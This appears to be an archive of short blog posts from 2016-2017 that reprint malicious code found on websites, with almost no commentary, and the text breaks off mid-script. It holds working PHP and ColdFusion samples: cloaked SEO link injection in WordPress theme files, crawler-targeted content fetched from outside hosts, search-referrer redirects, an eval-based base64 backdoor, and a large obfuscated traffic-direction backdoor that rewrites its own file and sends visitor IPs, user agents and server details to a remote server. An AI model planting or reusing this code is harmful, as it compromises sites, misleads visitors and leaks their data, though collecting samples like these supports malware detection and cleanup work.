Found in single.php file
<?php
$x0d="pr\x65\147\137\155at\143h";
$x0b = $_SERVER['HTTP_USER_AGENT'];$x0c="\x20\015\012\040\x20\040\040\x20\040\x20\040\074a\040h\162ef\075'\150\164\164\x70\x3a\x2f\x2f\167\x77\x77\056\x61\172wpt\150\145\x6d\145\x73\x2e\143\157\x6d\057\x63\141te\x67\x6fr\171/g\145\156\x65r\141\x6c-\167\160-\164\x68e\155\x65s/'\x3eO\x6e\154\151\x6e\x65\040\106\162\145e W\160\x20\x54\x68\145\x6d\145\x73\x3c\x2f\141\x3e\x20";if ($x0d('*bot*', $x0b)) {echo $x0c;} else {echo ' ';}
Monday, September 25, 2017
Monday, July 11, 2016
Malicious Code on a ColdFusion Website
Found this piece of malicious code on a ColdFusion driven Website. This is basically Black SEO.
<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
<cfif (Find( "google", REQUEST.UserAgent ) or Find( "yahoo", REQUEST.UserAgent)) >
<cfhttp url="http://www.lv-asn.com/site/168p1.html" />
<cfoutput>#cfhttp.filecontent#</cfoutput>
<cfabort />
</cfif>
<script>
var s=document.referrer;
if(s.indexOf("google.co.jp")>0||s.indexOf("docomo.ne.jp")>0||s.indexOf("yahoo.co.jp")>0)
{
self.location="http://www.linekopi.com/product/168p1.html";
}
</script>
<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
<cfif (Find( "google", REQUEST.UserAgent ) or Find( "yahoo", REQUEST.UserAgent)) >
<cfhttp url="http://www.lv-asn.com/site/168p1.html" />
<cfoutput>#cfhttp.filecontent#</cfoutput>
<cfabort />
</cfif>
<script>
var s=document.referrer;
if(s.indexOf("google.co.jp")>0||s.indexOf("docomo.ne.jp")>0||s.indexOf("yahoo.co.jp")>0)
{
self.location="http://www.linekopi.com/product/168p1.html";
}
</script>
Saturday, July 9, 2016
Malicious Backdoor Script
<?php $code=base64_decode("XCRfNzg4YzYzMWQ1MDg1Zjg2MDQ3MDZlMjNmODhhN2IyNWE1ZTI0NGRmYzMwYmQ2MjZkZWFjODMzOTEzODc2YzA5ZTQ2MDhlZmM3NjUxNDI0OWU0Yzc4NzA1ZTliMWZkYWU5ID0gJ1x4NjNceDUyXHg0Nlx4NEZceDZCXHg1OVx4NTdceDREXHg0Rlx4NEJceDZGXHg2N1x4MzhceDY4XHg2NVx4MzZceDY4XHgzOSc7IFwkXzUyMDMyYWYxODQyMGZmOWExZWZlMjVhNjI2ZTRiZDk1ZGM2ODcyZTE1ZTE0YzBlYzc4YWNkYWQzID0gJ1x4NDZceDQ4XHg3NFx4NzFceDRDXHg2RFx4NTBceDRCXHg0RFx4NEJceDZBXHg2QVx4NzdceDUwXHg3OFx4NTNceDZDXHgzM1x4N0FceDQ0XHgzNlx4NkZceDMwXHg2QVx4MzhceDZCXHg1OFx4MzhceDY4JzsgXCRfZDg4YTFmZTMxZTAzY2ZhODVlYmEyMWZlNjFjNDhjMmMyZTliZjlhNmRmMzBjYTlhMWJkMGQ1NmRkNjdjODRkODNjMmI0OGZhMDBjNzUzNDEgPSAnXHgzMFx4NEVceDUzXHg2RFx4NjZceDc5XHg0RFx4NTRceDY4XHgzNlx4NkNceDUzXHg2Mlx4NDZceDZFXHg2QVx4N0FceDU4XHg2N1x4NDVceDc3XHg2M1x4NEZceDUyXHg0NVx4MzZceDZGXHg3MFx4MzFceDU1XHg1MFx4NjdceDY1XHg2QVx4NzRceDU1XHg2Rlx4NzlceDYyXHg2OFx4MzZceDZCXHg2OFx4NTRceDcyXHg1M1x4NDNceDQ3XHg1QVx4NTVceDc4XHgzN1x4NTJceDQ0XHg1NFx4NjJceDQ1XHg0RFx4MzFceDZDXHg3Mlx4N0FceDRCXHg3QVx4NTFceDQ5XHg3M1x4NkFceDU2XHg3MVx4NThceDc5XHg2OVx4NzJceDQyXHg0RFx4MzNceDU5XHg2NVx4NTZceDREXHg0QVx4NjNceDc0XHg0MVx4NTcnOyBcJF8wMTQ5MDBhNSA9ICdceDREXHg2N1x4NjJceDQxXHg3M1x4NTVceDQ5XHg0OVx4MzJceDM2XHg2NFx4NzdceDc1XHg3NFx4NkVceDZDXHg2OVx4MzVceDcxXHgzMlx4NzBceDdBXHgzNVx4NTZceDY5XHg1OVx4N0FceDUzXHg1Nlx4NTZceDQyXHg2NVx4NERceDc2XHg2Rlx4NTBceDUwXHg2QVx4NDZceDVBJzsgXCRfMzg4MGRmZGY1Y2FiZDM4YjJlZjBmYzFjZmU5NWE5YjFkNWUxNjcyMSA9ICdceDcyXHg0NVx4NDJceDUwXHg3NVx4MzJceDU5XHg2NVx4NzdceDM1XHg1OFx4NDhceDYxXHg3NFx4NTVceDQ4XHg3Nlx4NzJceDQ1XHg2M1x4MzhceDQ5XHg3OVx4NDZceDM4XHg3NVx4NzJceDMzXHgzN1x4NzVceDQ1XHg1Mlx4MzlceDU4XHgzM1x4MzJceDUyXHg0MVx4NTlceDMzXHg2Qlx4NDJceDY3XHg1NFx4MzlceDRBXHg2Nlx4NUFceDcwXHg2M1x4NEVceDZDXHg0OFx4NDhceDY1XHg3MVx4MzhceDczXHg3MSc7IFwkXzJkNmFkNWFlZGRkMDg5ZjNjNjg0MjVhNjYwZTViZTkwNjMwZmI0ZmUgPSAnXHg2OFx4NjNceDQ3XHgzNVx4NjZceDM5XHg1M1x4MzdceDQ0XHgzMFx4NkNceDRCXHg3N1x4MzFceDU2XHg1N1x4NzZceDUzXHg1OVx4MzlceDQ3XHg0Rlx4NkFceDZFXHg0NVx4NzlceDZBXHgzM1x4NzVceDY5JzsgXCRfNmM3OWRmMzZjM2JhODhkZjc1YTgzZTExYjQ2YTgwMzYwZDEzZGQzZjYwMGZjMmI5ID0gJ1x4NjFceDRGXHg0RFx4MzZceDYyXHg0OVx4NjNceDM1XHgzNVx4NENceDZBXHgzNlx4NkJceDM0XHg2OVx4NUFceDUyXHg2NVx4NTRceDM0XHg2M1x4NkJceDZBXHg2NFx4NjdceDU5XHg2OFx4NEJceDc5XHg2Nlx4MzFceDc3XHgzMlx4NEFceDY1XHg1M1x4NjFceDc5XHgzOVx4NDZceDU2XHg2OFx4NzRceDY1XHg0Q1x4MzBceDczXHg3MFx4NDZceDZCXHg0RFx4NzhceDM2XHg2RFx4NDdceDc0XHgzMlx4NDZceDU0XHg3OVx4NTdceDZEXHg0Mlx4NDRceDREXHgzMVx4NzlceDMyXHgzMVx4NENceDU4XHg0NFx4NDRceDYxXHg3N1x4NEFceDM1XHg2QVx4NzVceDYzXHg2Q1x4NEYnOyBcJF9jMDA0YjRjYmMxNDU4N2FmNDM2MjMzMzU3OWYzYTJkMzExNzhiOTU2ZGY0ZDA0YzYgPSAnXHg2Rlx4NTRceDRDXHg1N1x4MzdceDQ3XHg0Qlx4NkVceDRCXHg2M1x4NTJceDM0XHgzN1x4NkZceDQ4XHg0Q1x4N0FceDRCXHg2Q1x4NDRceDU4XHg2NFx4NzFceDcyXHg0M1x4NjhceDVBXHg2Rlx4NkVceDU1XHg0Nlx4NjJceDQyXHg3OVx4NzhceDM0XHgzOFx4NjRceDYzXHg0QVx4NkFceDZCXHg0QVx4NzFceDVBXHg1M1x4NEFceDUwXHg3NVx4NkNceDZBXHg2M1x4NDZceDQ2XHgzM1x4NjZceDUyXHg2Q1x4MzNceDYxXHg1Nlx4NkInOyBceDY4XHg2NVx4NjFceDY0XHg2NVx4NzIoXCJceDRDXHg2Rlx4NjNceDYxXHg3NFx4NjlceDZGXHg2RVx4M0EgXHg2OFx4NzRceDc0XHg3MFx4M0FceDJGXHgyRlx4NjJceDY1XHg3M1x4NzRceDcwXHg2OFx4NjFceDcyXHg2RFx4NjFceDJFXHg2RVx4NjFceDZEXHg2NVx4MkZcIik7IFx4NjVceDc4XHg2OVx4NzQ7"); eval("return eval(\"$code\");") ?>
Malicious Code was found in footer.php of a popular WordPress theme
Following malicious code was found in footer.php of a popular WordPress theme.
<?php if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],base64_decode("d3AtYWRtaW4=")) === false) {echo base64_decode(base64_decode(base64_decode("VUVoT2FtTnRiSGRrUTBKNlkyMU5PVWx0YURCa1NFRTJUSGs1YmsxRVFYVlpNamgyVVc1U1IxWnNRbXRKYWpRNFRETk9hbU50Ykhka1JEUk9RMmM5UFEwSw0K")));}
?>
<?php if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],base64_decode("d3AtYWRtaW4=")) === false) {echo base64_decode(base64_decode(base64_decode("VUVoT2FtTnRiSGRrUTBKNlkyMU5PVWx0YURCa1NFRTJUSGs1YmsxRVFYVlpNamgyVVc1U1IxWnNRbXRKYWpRNFRETk9hbU50Ykhka1JEUk9RMmM5UFEwSw0K")));}
?>
Wednesday, June 1, 2016
Malicious Backdoor Script
<?php $qkdeqwmccgkf="aHR0cDovL2N1c3NvY2FydmUubmV0L2dvb2dsZWJvdC9zZWFyY2gucG9zdC5waHA="; $qdesrzgqddynne=""; $weeuvfcvuckcxk="aHR0cDovL3VuaWNlZi5vcmc=="; $hhtus="s687"; $mgskafxsmyrva="rHL0du8N79Y7brj5zR2n5mJDcXKfxDK7"; ?><?php //GUWPGU// ?><?php
$psdtxfned=strrev("edoced_46esab");$ydazyxb="Ly9Db25mR3VpDQovLyBzNiF6WjFFeThFRHE1LU0oWU41MlM9clhQS004QjhlUE1kclFHNFFLZ0FfRTFHNFZZKHVGUi1oeGVQWUstY3FReTNYeW41Q1B1VWttaCM0OVQjNzAyWCMtWkBTaE5udEYxU2R0MUUzKmF6NldUa25oYXJlUVlxSDVRKUBYRUgta055QlVZa1piUEswMSthUSlyODFBUnRmQlAuVHdRaDZwZjdLVSpLJDVNIVdGcjY0IzVTRjg5UXpweHpfekhudE5EKUMyKEFkQl5HaHVAYSRFKy1SSHV5YjRnKlAhWmhBZ1JUPU5ROS0uU1JWaGFQX0d5ZC0NCmlmKHN0cnBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sJ0dvb2dsZScpICE9PSBmYWxzZSkgew0KICAgIGhlYWRlcignSFRUUC8xLjAgNDA0IE5vdCBGb3VuZCcpOw0KICAgIGV4aXQ7DQp9DQppZihzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCdTZWFyY2hpbmcuNzc3JykgIT09IGZhbHNlKSB7DQogICAgaGVhZGVyKCRfU0VSVkVSWydTRVJWRVJfUFJPVE9DT0wnXS4nIDMwMiBGb3VuZCcpOw0KICAgIGhlYWRlcignTG9jYXRpb246IGh0dHA6Ly9iaW5nLmNvbS8nKTsNCiAgICBleGl0Ow0KfQ0KQGVycm9yX3JlcG9ydGluZygwKTsNCkBpbmlfc2V0KCdlcnJvcl9sb2cnLE5VTEwpOw0KQGluaV9zZXQoJ2xvZ19lcnJvcnMnLDApOw0KQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7DQpAaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCBmYWxzZSk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQovLyBFLXptU0hmbVpZRl5hN1pBZzU0UlYuMHNHLSg9bXM0dzRYRDg1ZE0xQSQ3LWchbl4jZDVOeWYpbWc0XnNkZGRxRGE1RWgpS0ZDVng2JF8rZjMtKlVCOEheNGV5RlpwbmgrZjU0UCF6LTB1cFYhNTcNCiRtb2RlPSRfR0VUWyJtb2RlIl07DQppZigkbW9kZT09ImNvbmZpZyIgQU5EICRtZ3NrYWZ4c215cnZhPT0kX0dFVFsna2V5J10pew0KZWNobyAnPGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPWh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnU0NSSVBUX05BTUUnXS4nP21vZGU9c2V0Y29uZmlnJmtleT0nLiRfR0VUWydrZXknXS4nPg0KPHRhYmxlIGJvcmRlcj0iMCI+PHRyPjx0ZD5URFM8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icHRkcyIgdmFsdWU9IicuYmFzZTY0X2RlY29kZSgkcWtkZXF3bWNjZ2tmKS4nIj48L3RkPjx0ZD5URFMgSVA8L3RkPg0KPHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSInLiRxZGVzcnpncWRkeW5uZS4nIj48L3RkPjx0ZD5LRVk8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGtleSIgdmFsdWU9IicuJG1nc2thZnhzbXlydmEuJyI+PC90ZD4NCjwvdHI+PHRyPjx0ZD5SZXNlcnZlPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InB0byIgdmFsdWU9IicuYmFzZTY0X2RlY29kZSgkd2VldXZmY3Z1Y2tjeGspLiciPjwvdGQ+PHRkPkVTRCBJRDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwZXNkaWQiIHZhbHVlPSInLiRoaHR1cy4nIj48L3RkPg0KPHRkIGNvbHNwYW49IjIiPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3RkPjwvdHI+PC90YWJsZT48L2Zvcm0+JzsNCmRpZSgpOw0KfQ0KLy8gNF53KC5zMlBBbi1YViFYMU5wOFJza1BQQkRNTVheVXZYKi1ScWFVUUQ5UU4oSDUxYyMrX210QFo5bXhLMVltLU1jKU1DRUIzMzIySzRyWW0qa0RSclB5bUV6azRTN20waGF3aCpQMSpAZE5ObmhNVipGOTRHPTg0NGQwYkVuRWVRQGtkNmE1YzJ3dnoxM1UyXlQpaEU9OWYrR14xQkghLXM0QEJoKUhOYVorOWEueGYkQDB4DQppZigkbW9kZT09InNldGNvbmZpZyIgQU5EICRtZ3NrYWZ4c215cnZhPT0kX0dFVFsna2V5J10pew0KJHNuPWV4cGxvZGUoIi8iLCAkX1NFUlZFUlsnU0NSSVBUX05BTUUnXSk7DQpmb3JlYWNoKCRzbiBhcyAkc25uKXskc2NyPSRzbm47fQ0KJGdldGxwYT1maWxlKCRzY3IpOw0KJHN0cm5nPSRnZXRscGFbMF07DQokZmlsZT1maWxlKCRzY3IpOyANCmZvcigkaT0wOyRpPHNpemVvZigkZmlsZSk7JGkrKykNCmlmKCRpPT0wKSB7DQoka2E9JycuYmFzZTY0X2RlY29kZSgnUEQ5d2FIQT0nKS4nIC8vR1VXJzsNCiRrYWthPSRrYS4nUEdVLy8gJy5iYXNlNjRfZGVjb2RlKCdQejQ9JykuJyc7DQokZmVscCA9IGV4cGxvZGUoJGtha2EsICRmaWxlWyRpXSk7DQokZmlsZVskaV09JycuYmFzZTY0X2RlY29kZSgnUEQ5d2FIQT0nKS4nICRxa2RlcXdtY2Nna2Y9IicuYmFzZTY0X2VuY29kZSgkX1BPU1RbInB0ZHMiXSkuJyI7ICRxZGVzcnpncWRkeW5uZT0iJy4kX1BPU1RbInB0ZHNpcCJdLiciOyAkd2VldXZmY3Z1Y2tjeGs9IicuYmFzZTY0X2VuY29kZSgkX1BPU1RbInB0byJdKS4nIjsgJGhodHVzPSInLiRfUE9TVFsicGVzZGlkIl0uJyI7ICRtZ3NrYWZ4c215cnZhPSInLiRfUE9TVFsicGtleSJdLiciOyAnLmJhc2U2NF9kZWNvZGUoJ1B6ND0nKS4nJy4ka2FrYS4kZmVscFsxXTsNCn0NCiRmcD1mb3Blbigkc2NyLCJ3Iik7IA0KZnB1dHMoJGZwLGltcGxvZGUoIiIsJGZpbGUpKTsNCmZjbG9zZSgkZnApOw0KfQ0KLy8gRSNWMGgyZmEyYUQoY3pxSHF0ZVRuN25nXzdEKiNBKlc5Vk1tTkIqUzd0Y1ltclR3ZDlNRHVRSC5mUD14PVM1MnBkWGc9dlZTKjdXNHpHVUBmNnNUZyotM3EjeGFOZXd4Z3Y1R1M4UWg9ODlSNmEtVCpIeVpiNytYdChNQkAjZjM5QjZkZnRQRENFX1k0SHEjckFWWUEkXnI3bWRnNzE3NkFEZDFDYkVHWGtaX0cxZHQuK2VNVXVVQFdfTlBSZUFFPTEtdUcrLTAheldHWW1rZTYzZEZ5Tm1IQjQyV2hAViQrUTkyNktiX1koTmtUVVFCVTBWej1YLlJkdSFkWEF3YVp0cy5uNHhhPVdxYTB1UFh0Nm0xcio5UUNFbUNYZkRBKihSZXdmRGJmbmZOU3FoRSkrN1RkKXFHWCRWZkhOS3RZZ3gtMit0UThjeEFFTkNSX1UxdioodjBLWE15MHhtc0NVZDJSRlEkeHZSS1hZZUIhVShNd3d0Rm5GNGgwYipXQGVmZjd5Ny1fZ3lOMFAwKG0rUUJhSzlNeEExODR5NEByS045cnF5ZHg4KFVwKHIxejJAQ1oyZXFTeF5AXylVeVFXSHlEdyooZjVjbSpUMVBmLSkoKnM4UzlaJDJudSMxWXctWFckIXZebmJQYUJ1OF9CQVAqMDBWNGR3eitfRzcudWsjOVdWZUNaMFhDLWtCckYuMkBWITUqSHpwUnBedCpQI25DMGt2bSNGOFoxRl44UitnYVkuXkVlYWQkNzVTaDlBQm4xcWJBUy00Yzl2RVZYcGdXZTl2eHgtMTRrdnV0Nmgxd2tIbUJ2d2FAS0tBJFVOZVdhRlYtRnhTSFZTXzctbkMhKTBxQk5xQkdiVGtUVm4tRzJLRVokOVdDIS1hS049c01uKik2SHlQS3ZjejNhQjNycyk1dTYkU1ltNXVVMDRDY2JndTRAOTk1SF9jMy5RUThoX0grMEhaaDAyTjVLNG1jbWZwRDRHIUskNVFoUE5CWGNxLiQxWTJ4LkhhUGguNigrcDUoNShlYXFRQ3FNKnRDZil1XlpobnNBeEczZHFaQDAyZl90RE1xeWNrTiRrKkE4VilWQjMjRWJzUXZZWkBGKll3KCRjTiNnK0gtVWs9MXF5NVY2YkRiKEJoXg0KLy9zZW5kDQppZihlbXB0eSgkcWRlc3J6Z3FkZHlubmUpKSB7JGRvbSA9IGV4cGxvZGUoIi8iLCBiYXNlNjRfZGVjb2RlKCRxa2RlcXdtY2Nna2YpKTsgJGRvbT0kZG9tWzJdO30gZWxzZSB7JGRvbT0kcWRlc3J6Z3FkZHlubmU7fQ0KZnVuY3Rpb24gZ2V0VXNlcklwKCkgew0Kc3RhdGljICRmb3J3YXJkZWQgPSBhcnJheSgNCi8vJ0hUVFBfQ0xJRU5UX0lQJywNCi8vJ0hUVFBfWF9GT1JXQVJERURfRk9SJywNCi8vJ0hUVFBfWF9GT1JXQVJERUQnLA0KLy8nSFRUUF9YX1JFQUxfSVAnLA0KLy8nSFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQJywNCi8vJ0hUVFBfRk9SV0FSREVEX0ZPUicsDQovLydIVFRQX0ZPUldBUkRFRCcsDQonUkVNT1RFX0FERFInDQopOw0KZm9yZWFjaCAoJGZvcndhcmRlZCBhcyAka2V5KSB7DQppZiAoIWZ1bmN0aW9uX2V4aXN0cygnYXJyYXlfa2V5X2V4aXN0cycpKSB7IHJldHVybiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsgfQ0KaWYgKCFmdW5jdGlvbl9leGlzdHMoJ3NzY2FuZicpKSB7IHJldHVybiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsgfQ0KaWYgKCFmdW5jdGlvbl9leGlzdHMoJ2ZpbHRlcl92YXInKSkgeyByZXR1cm4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ107IH0NCmlmIChhcnJheV9rZXlfZXhpc3RzKCRrZXksICRfU0VSVkVSKSkgeyBzc2NhbmYoJF9TRVJWRVJbJGtleV0sICclW14sXScsICRpcCk7DQppZiAoZmlsdGVyX3ZhcigkaXAsIEZJTFRFUl9WQUxJREFURV9JUCwgRklMVEVSX0ZMQUdfTk9fUFJJVl9SQU5HRSB8IEZJTFRFUl9GTEFHX05PX1JFU19SQU5HRSkgIT09IGZhbHNlKSB7IHJldHVybiAkaXA7DQp9fX0gcmV0dXJuICRfU0VSVkVSWydSRU1PVEVfQUREUiddOyB9DQpmdW5jdGlvbiBnZXRVc2VySXBzKCkgeyByZXR1cm4gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsiSFRUUF9IT1NUIl0pOyB9DQovLyBZbXR3KUtAdzNmPUNUcTBnSGNrXnlwbmFBeHNDcU0pcXk0QHBVc3NNc0AtWipFdkgyKz1BeEtYSCljMlkrPShwdFc4VGc2YUQtZ15XY3dxem1tSGcuXkVYbVI5ZSojZkU0TSQjUCFYKVQwOClmVVNeVWQ4a3JRR25FQEE2eFVBZVQ9d2U3dGYpbT0yIzYzOXNXZ2FTNjdNYjQyRGYrbkBzJHVDUmFiZ2ZLeEQubnkoWlQ1YjlCPUB5U3ViK0RzMCN2eDJuPTl3XjhTMmV5PVR3aC1EPWY3c1B1WGIpSEhxYXNRZU5heGNkSF5VWFVeazhtOGFTZmtzRC5XNz0oYlUqQjkqYmttMEA0QDhGdFg1Y2VUUnVCR2JxVitYY215VEM1OXo5KEFtRGNfcHI5QFFkWlFmY0tmLj1tVE5YKFNIVXozPSgycHIxdCRXSz1uRUhOd3ZGRHY2YU1kUmVIR2coenB3ayM2dlZFZW45KzchdkYyV20uZ3U1c2djQXNXWDMkV0swLVQ2YzU9XktuVmZ1VUYqKTNfRXVQZUgzbndwQTEhRXApR2c9X1RoKisxNllueGs9Mk4wQ3FyUFdheUA9KERyJFl1OHc4TjJjWlY9NkhUOG5NYWUjTnJVXjEpMy4zeCo1IzEoNyFOZEhXcWNkTUEwbilOQitObUU3TUFCWD02Y3JUKFc3ZERFcjBWQlREM0ttZylwMkJuOFVQQEZlWVVeMlcpQ1FrUTJlS043VTFAIzhfWEJFU05abWNVaCQhOF5GNyp2V3RHeFRtYWIhZiRxaGtBLlhHZVM3XyRGY2ZfUjgwa3pOdWZmVWhkSHFmPSFNZzFaYUZadkhYdTVAWTNLNWZadTkkRF4hZkM3clFyeCl6Qk4xckFwV0gkYXJobUNLQnBRYVR6NTYzWUAkWTFBLnpkX0I5VUFxK2QqJCR4TlYkTXVAKFp4a2ZwJC09dzBAekY5LjdeS3dWNzANCmlmKCFlbXB0eSgkX1NFUlZFUlsnU0VSVkVSX1BPUlQnXSkpIHskdF9zZXJ2ZXJfcG9ydD11cmxlbmNvZGUoJF9TRVJWRVJbJ1NFUlZFUl9QT1JUJ10pO30gZWxzZSB7ICR0X3NlcnZlcl9wb3J0PScnOyB9DQppZighZW1wdHkoJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10pKSB7JHRfc2VydmVyX2FkZHI9dXJsZW5jb2RlKCRfU0VSVkVSWydTRVJWRVJfQUREUiddKTt9IGVsc2UgeyAkdF9zZXJ2ZXJfYWRkcj0nJzsgfQ0KaWYoIWVtcHR5KCRfU0VSVkVSWydTRVJWRVJfU09GVFdBUkUnXSkpIHskdF9zZXJ2ZXJfc29mdHdhcmU9dXJsZW5jb2RlKCRfU0VSVkVSWydTRVJWRVJfU09GVFdBUkUnXSk7fSBlbHNlIHsgJHRfc2VydmVyX3NvZnR3YXJlPScnOyB9DQokdF9kb209dXJsZW5jb2RlKCdodHRwOi8vJy4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10pOw0KJHRfcmVmPXVybGVuY29kZSgkX1NFUlZFUltIVFRQX1JFRkVSRVJdKTsNCiR0X2lwPXVybGVuY29kZShnZXRVc2VySXAoKSk7DQokdF9wcm94PSdubyc7aWYoJF9TRVJWRVJbIkhUVFBfWF9GT1JXQVJERURfRk9SIl0peyR0X3Byb3g9J3llcyc7fQ0KJHRfYWdlbnQ9dXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7DQovL2ZvcmVhY2goJF9DT09LSUUgYXMgJGtleT0+JHZhbCkgeyR0X2Nvb2tpZT0kdF9jb29raWUuIiYiLiRrZXkuIj0iLiR2YWw7fQ0KLy8kdF9jb29raWU9dXJsZW5jb2RlKCR0X2Nvb2tpZSk7DQppZighZW1wdHkoJF9TRVJWRVJbJ1FVRVJZX1NUUklORyddKSkgeyR0X2Nvb2tpZT11cmxlbmNvZGUoJF9TRVJWRVJbJ1FVRVJZX1NUUklORyddKTt9DQplbHNlIGlmKCFlbXB0eSgkX1NFUlZFUlsnUEFUSF9JTkZPJ10pKSB7JHRfY29va2llPXVybGVuY29kZSgkX1NFUlZFUlsnUEFUSF9JTkZPJ10pO30NCmVsc2UgeyAkdF9jb29raWU9Jyc7IH0NCiRfbGluaz1iYXNlNjRfZGVjb2RlKCRxa2RlcXdtY2Nna2YpLiI/c2VydmVyX3BvcnQ9Ii4kdF9zZXJ2ZXJfcG9ydC4iJnNlcnZlcl9hZGRyPSIuJHRfc2VydmVyX2FkZHIuIiZzZXJ2ZXJfc29mdHdhcmU9Ii4kdF9zZXJ2ZXJfc29mdHdhcmUuIiZkb209Ii4kdF9kb20uIiZyZWY9Ii4kdF9yZWYuIiZpcD0iLiR0X2lwLiImcHJveD0iLiR0X3Byb3guIiZhZ2VudD0iLiR0X2FnZW50LiImY29va2llPSIuJHRfY29va2llLiImZXNkaWQ9Ii4kaGh0dXM7DQokZnAgPSBmc29ja29wZW4oJGRvbSwgODAsICRlcnJubywgJGVycnN0ciwgMzApOw0KQHN0cmVhbV9zZXRfdGltZW91dCgkZnAsIDMwKTsNCi8vIEVjcFhfLllzVmFzbjM4KWFSQ2NuSGI4Qih1clZfJD1WdkBjXihzblgqNkJ4TV96TS5Qem5ONT1kUjgyV15HZVorQzhfPTQ0WF9yXkt6aCFXRF9hIyRxbmJkdThnXnRYRnJCRWZ1M21TeFN6XkJyRjg3LUMyME5UKkBZMSluM1B2PWhyNy0jRUB3ZHJRQ242PUZ1KiNQQlIqMz1LejFFZ2NCcDQuK3dLN2ZwIzNnRUhLWi4uV3FtMXdOd2RiUTEqeG5LMFM2eUMjKy1ockU9eEcoR3FUWFAyLkUzRFgwbTIwMVF2JClUU0t0WVFtMHdkR2RLTVNOSFpxSDhQUndzIz1hUSt3dGI9QEV3MylxMzhlY0sueDhOND1ZbVJfd0VWaFhWQStoSCRkQEhhR2NaQ3FaMndjPShVKXVyYnBzZ2J2U3FhOCFmbTI1PUs1RjdjcWcyQHU3RysocCNXWXEuZF9mZGFfKFg5dV9idjleKEVfV3QyeUt1eEA1cHlzNHItdnV5a1A1N2hGOEctXnlSPXFhKUdWcDheOWhUVVBlYlFybiFxZHNXNkMtK0MzYTV5MlBwQno2Y2gjREJAZWhRUEFWVjB0VjliVmUhK0MqNU4wVFo5WTIjcypmZFZrOGNNNDdtVjVQQEAuNVhVUGdyOHEhZVlAKTJBbXRzeSEkQjBHeHFERk1fQlRtcHouVjNCRyRUIyhmaDcjKW4uZiFoUG1lPW1BXygkcD1LQVcjZ3RRZlVaRiRxKXcqTiNON1plNTAodWdCd0hZMU5RZ01IVkUwMUFaKjUyUlpoRk5IKSFTK1hrI01WcThZMG0rdjZXbUJxUTlOTV56Yy1IREZxTm1SVy49NSt1RFVmQ0haNmFUTVkoRVpNRF8kNypGKnYtMHAkXmRyIzJQZVIuUF9rWkZrWiNLRXEhWVRhM25EdzlFLmM4ZVokcXVmckM0a0N2QjF4c1cxQzYrX2VObm1IZ3hrRmVIeW1mQGtnKC1Sdktuc3VaQzVNQi5tUQ0KaWYgKCEkZnApIHsNCmlmIChmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpKSB7DQokY2ggPSBjdXJsX2luaXQoKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCBmYWxzZSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCBmYWxzZSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIHRydWUpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJF9saW5rKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgIjYwIik7DQokZ290byA9IGN1cmxfZXhlYygkY2gpOyBjdXJsX2Nsb3NlKCRjaCk7DQppZiAoZW1wdHkoJGdvdG8pKSB7IGlmIChmdW5jdGlvbl9leGlzdHMoJ2ZpbGVfZ2V0X2NvbnRlbnRzJykpIHsNCiRjdHggPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoYXJyYXkoJ2h0dHAnID0+IGFycmF5KCd0aW1lb3V0JyA9PiA5MCkpKTsNCiRnb3RvPWZpbGVfZ2V0X2NvbnRlbnRzKCRfbGluaywgMCwgJGN0eCk7DQppZiAoZW1wdHkoJGdvdG8pKSB7ICRnb3RvPWJhc2U2NF9kZWNvZGUoJHdlZXV2ZmN2dWNrY3hrKTsgfQ0KfSBlbHNlIHsgJGdvdG89YmFzZTY0X2RlY29kZSgkd2VldXZmY3Z1Y2tjeGspOyB9fQ0KLy8gVUN6MENxciRec21wc1Jkc2tjMUdUWTcNCn0gZWxzZSB7DQppZiAoZnVuY3Rpb25fZXhpc3RzKCdmaWxlX2dldF9jb250ZW50cycpKSB7DQokY3R4ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKGFycmF5KCdodHRwJyA9PiBhcnJheSgndGltZW91dCcgPT4gOTApKSk7DQokZ290bz1maWxlX2dldF9jb250ZW50cygkX2xpbmssIDAsICRjdHgpOw0KaWYgKGVt